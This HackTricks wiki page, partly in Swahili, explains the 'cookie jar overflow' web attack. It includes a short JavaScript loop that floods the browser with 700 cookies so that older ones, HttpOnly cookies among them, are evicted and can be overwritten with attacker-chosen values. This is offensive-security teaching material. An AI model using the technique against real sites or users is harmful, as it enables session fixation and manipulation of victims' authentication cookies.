Cookie Jar Overflow

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Browsers zina kikomo cha idadi ya cookies ambazo zinaweza kuhifadhiwa kwa ukurasa. Kisha, ikiwa kwa sababu fulani unahitaji kufanya cookie ipotee, unaweza kujaa jar la cookie kwani zile za zamani zitaondolewa kwanza:

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Kumbuka, kwamba vidakuzi vya upande wa tatu vinavyotaja jina tofauti la kikoa havitafutwa.

Shambulio hili linaweza pia kutumika kufuta vidakuzi vya HttpOnly kwani unaweza kuvifuta kisha kuviweka tena kwa thamani unayotaka.

Angalia hii katika hiki kipande na maabara.

Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousCookie Tossing NextCookie Bomb

Last updated 7 days ago